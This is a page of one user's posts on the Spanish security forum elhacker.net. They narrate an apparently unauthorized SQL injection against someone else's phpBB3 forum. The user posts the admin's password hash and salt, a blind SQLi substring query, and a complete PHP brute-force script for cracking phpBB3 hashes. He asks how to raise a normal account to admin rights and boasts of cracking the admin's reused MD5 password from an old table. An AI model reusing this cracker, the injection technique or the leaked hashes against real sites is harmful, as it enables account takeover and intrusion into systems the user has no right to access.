elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Mensajes
Páginas: 1 ... 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [24] 25
231  Seguridad Informática / Nivel Web / Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo. en: 14 Junio 2010, 18:47 pm
BUENO PORFIN XUSTY 1 WEB 0 !!!!!!!!!!!!!!!!!!!!

Nada no consegui descifrar nada de eso lo que hice fue lo siguiente.

Como consegui los datos por un SQLi lo que hize al cabo de horas i horas fue mirar otras Data Bases y me di cuenta de algo en otras Data bases habian tambien phpbb_ y yo dije juer que raro bueno que me puse a trastear i sace unos cuantos users a los que probe en el foro i Lo sentimos pero debido al update del foro no emos podido convertir tu pass porfavor intreoduzela tal tal..
entonces dije esto tiene algo que ver y claro que lo tenia era el foro antiguo en phpbb2 jajajaj lo que hize fue cojer la tabla de users i Bingo por suerte estaban en md5.

Por asombro mio cuando desencrypte el MD5 me di cuenta de que el admin tenia muy poca creatividad y encima no se molestaron ni a cambiar el pass al cambiar el foro.

Un saludo a todos y espero que os sirva a alguno ya ves aveces la solucion esta buscando en otro sitio :))))
232  Seguridad Informática / Criptografía / Re: Un Hash de PHPBB3 en: 14 Junio 2010, 15:17 pm
Bueno he encontrado la manera en que codifica la pass

base64(md5+salt);

alguien sabe algun programa que me deje poner esos parametros y que intente a bruteforce por charset??¿?
233  Seguridad Informática / Criptografía / Un Hash de PHPBB3 en: 14 Junio 2010, 04:39 am
Bueno como creo que esto va mejor aqui posteo aqui esta es mi duda  :-\

HASH: $H$9YSi5FYkRx4aIMejyZo.9LCvuefQb31
SALT: 16eeb051d024903a
PASS: deface

entonces si....

HASH: $H$9tJpe2rPbpx2LBGc1gb/9BqVfrmDhS/
SALT: ca28b6b43c28f6b3
PASS: ???????????????????? Como la puedo sacar?¿?¿?

Un saludo i gracias.
234  Seguridad Informática / Nivel Web / Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo. en: 14 Junio 2010, 03:42 am
Bueno sigo aportando mas cosas :)

HASH: $H$9YSi5FYkRx4aIMejyZo.9LCvuefQb31
SALT: 16eeb051d024903a
PASS: deface

entonces si....

HASH: $H$9tJpe2rPbpx2LBGc1gb/9BqVfrmDhS/
SALT: ca28b6b43c28f6b3
PASS: ???????????????????? Como la puedo sacar?¿?¿?
235  Seguridad Informática / Nivel Web / Re: [SQLi]MSSQL ayuda. en: 14 Junio 2010, 01:54 am
Tu lo que buscas es esto :)

SELECT nombre FROM usuarios WHERE id=2 AND (SELECT Count(*) FROM usuarios WHERE SUBSTRING(user,1,1)=char(97)) > 0

;)
236  Seguridad Informática / Nivel Web / Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo. en: 14 Junio 2010, 01:31 am
Bueno si todo esto no funciona... Alguien sabe algun modo de obtener Permisos Admin en un user normal?¿ Algo como crear un user y añadirle a la tabla de permisos el rango de admin. No se si mediante una inyeccion xploit o lo que sea sera posbile eso :S
237  Seguridad Informática / Nivel Web / Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo. en: 14 Junio 2010, 01:02 am
Por cierto el Script Funciona :D
Pero vamos attempting to crack with 4 characters. Tal vez si tengo suerte i el admin a puesto una pass corta funcione :)
238  Seguridad Informática / Nivel Web / Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo. en: 14 Junio 2010, 00:58 am
Na si pongo cualquier table la que sea users o alguna otra siempre me da lo mismo.
Asipt_table."nombre de la tabla que pongo"
Es un prefix que ponen al hacer la consulta talvez aya algun modo de borrar el prefix y entonces si que funcione pero no se no se :S
239  Seguridad Informática / Nivel Web / Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo. en: 14 Junio 2010, 00:33 am
Ahh! os dejo el script por aqui si alguien lo necesita :)
Código
  1. /////////////////////////////////////////////////////////////////// R00TSECURITY.ORG - YOUR SECURITY COMMUNITY // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -// [2008-07-15] PhpBB3 Hash Bruteforce// http://r00tsecurity.org/db/code/134// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -// GENERATED ON: 2010-06-13 | 17:52:35/////////////////////////////////////////////////////////////////CODE INFOUSAGE:
  2. php script.php 'hash' charsSOURCE CODE#!/usr/bin/php
  3. <?php
  4.  
  5. echo "///////////////////////////////////////////////\r\n";
  6. echo "//         PHPBB3 Bruteforce             //\r\n";
  7. echo "//  Original bruteforce script by Tux      //\r\n";
  8. echo "//     Moded for Phpbb3 by Jeforce     //\r\n";
  9. echo "//     http://www.jeforce.net            //\r\n";
  10. echo "////////////////////////////////////////////\r\n";
  11.  
  12. if ($argc<2 || $argv[1]=='--help') {
  13.    echo<<<END
  14. USAGE: {$argv[0]} 'hash' chars
  15.     - hash        : The hash to crack
  16.     - chars        : Max length string to attempt to crack
  17.  
  18. HELP: {$argv[0]} --help
  19.  
  20.  
  21. END;
  22.    exit;
  23. }
  24. //Fonction PHPBB3
  25.  
  26. function _hash_crypt_private($password, $setting, &$itoa64)
  27. {
  28. $output = '*';
  29. // Check for correct hash
  30. if (substr($setting, 0, 3) != '$H$')
  31. {return $output;}
  32.  
  33. $count_log2 = strpos($itoa64, $setting[3]);
  34. if ($count_log2 < 7 || $count_log2 > 30)
  35. {return $output;}
  36. $count = 1 << $count_log2;
  37. $salt = substr($setting, 4, 8);
  38. if (strlen($salt) != 8)
  39. {return $output;}
  40.  
  41. $hash = pack('H*', md5($salt . $password));
  42. do
  43. {
  44. $hash = pack('H*', md5($hash . $password));
  45. }
  46. while (--$count);
  47. $output = substr($setting, 0, 12);
  48. $output .= _hash_encode64($hash, 16, $itoa64);
  49. return $output;
  50. }
  51. function _hash_gensalt_private($input, &$itoa64, $iteration_count_log2 = 6)
  52. {
  53. if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31)
  54. {$iteration_count_log2 = 8;}
  55. $output = '$H$';
  56. $output .= $itoa64[min($iteration_count_log2 + ((PHP_VERSION >= 5) ? 5 : 3), 30)];
  57. $output .= _hash_encode64($input, 6, $itoa64);
  58. return $output;
  59. }
  60.  
  61. /**
  62. * Encode hash
  63. */
  64. function _hash_encode64($input, $count, &$itoa64)
  65. {
  66. $output = '';
  67. $i = 0;
  68. do
  69. {
  70. $value = ord($input[$i++]);
  71. $output .= $itoa64[$value & 0x3f];
  72. if ($i < $count)
  73. {$value |= ord($input[$i]) << 8;}
  74. $output .= $itoa64[($value >> 6) & 0x3f];
  75. if ($i++ >= $count)
  76. {break;}
  77. if ($i < $count)
  78. {$value |= ord($input[$i]) << 16;}
  79. $output .= $itoa64[($value >> 12) & 0x3f];
  80. if ($i++ >= $count)
  81. {break;}
  82. $output .= $itoa64[($value >> 18) & 0x3f];
  83. }
  84. while ($i < $count);
  85. return $output;
  86. }
  87. function phpbb_check_hash($password, $hash)
  88. {
  89. $itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
  90. if (strlen($hash) == 34)
  91. {
  92. return (_hash_crypt_private($password, $hash, $itoa64) === $hash) ? true : false;
  93. }
  94. return (md5($password) === $hash) ? true : false;
  95. }
  96.  
  97. //if(isset($argv[4])) $charset=$argv[4];
  98. //else $charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
  99.  
  100. $charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
  101. $charset_beginning = $charset{0};
  102. $charset_end = $charset{strlen($charset)-1};
  103.  
  104. //$HASH = '$H$99i1.eNyzhGdi5/lAnKnSjU8iIABC80';
  105. // $SIZE = (int) $_GET['chars'];
  106. $HASH = $argv[1];
  107. $SIZE = (int) $argv[2];
  108.  
  109. $start = time()-1;
  110. $curtotal=0;
  111. $total=0;
  112. for($i=$SIZE; $i>0; $i--) $total+=pow(strlen($charset), $i);
  113. $split=ceil(($total/strlen($charset))/5);
  114.  
  115.  
  116. echo " *** MAX SIZE: $SIZE, cracking HASH: $HASH\r\n";
  117. echo " *** TOTAL KEYS: $total\r\n";
  118. echo " *** CHARSET: $charset\r\n";
  119.  
  120. for($i=1; $i<=$SIZE; $i++) {
  121.    $keyspace = pow(strlen($charset), $i);
  122.    echo "\r\nAttempting to crack with $i characters.\r\n";
  123.    echo " *** Total combinations: $keyspace\r\n";
  124.  
  125.    $key = '';
  126.    for ($y=0; $y<$i; $y++) $key .= $charset_beginning;
  127.  
  128.    for ($x=0; $x<$keyspace+1; $x++) {
  129.        $curtotal++;
  130.  
  131.        if (phpbb_check_hash($key, $HASH)) {
  132.            $time=(time()-$start);
  133.            echo<<<END
  134.  
  135. Successfully key cracked after $time seconds. The cracker searched a total
  136. of $curtotal keys out of a possible $total in $time seconds.
  137.  
  138. Found the clear text of '$HASH' is '$key'.\n
  139. END;
  140.            exit;
  141.        }
  142.  
  143.        if($x%$split == 0) {
  144.            $rate=ceil($curtotal/(time()-$start));
  145.            echo " ... $curtotal/$total ($key) [$rate Keys/second]\r\n";
  146.        }
  147.  
  148.        for ($y=0; $y<$i; $y++) {
  149.            if ($key[$y] != $charset_end) {
  150.                $key[$y] = $charset{strpos($charset, $key[$y])+1};
  151.  
  152.                if ($y > 0)  for ($z = 0; $z < $y; $z++) $key[$z] = $charset_beginning;
  153.                break;
  154.            }
  155.        }
  156.    }
  157. }
  158. $time=time()-$start;
  159. echo<<<END
  160. *** SORRY NO MATCHS FOUND
  161.     Time running : $time. Keys searched : $total.\n
  162. END;
  163. ?>// http://r00tsecurity.org/db/code/134
  164.  
Hasta luego!
240  Seguridad Informática / Nivel Web / Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo. en: 14 Junio 2010, 00:30 am
Weno haber si alguien me echa una mano jijiji

De momento he estado investigando y buscando por hay por hay.
He encontrado algo pero aun no lo he probado y ahora probare que me tenio que instalar el php para ejecutar un Script haber si rula. Tambien he encontrado una columna muy curiosa llamada user_form_salt y parece que funciona al azahar:)
Bueno en definitiva que tengo esto.

User: Admin
Hash: $H$9tJpe2rPbpx2LBGc1gb/9BqVfrmDhS/
Salt: ca28b6b43c28f6b3

Weno voy a probar el script.
Echarme el ultimo empujoncito si algien sabre resolver lo que falta :D

Un saludo a todos :)
Páginas: 1 ... 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [24] 25
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines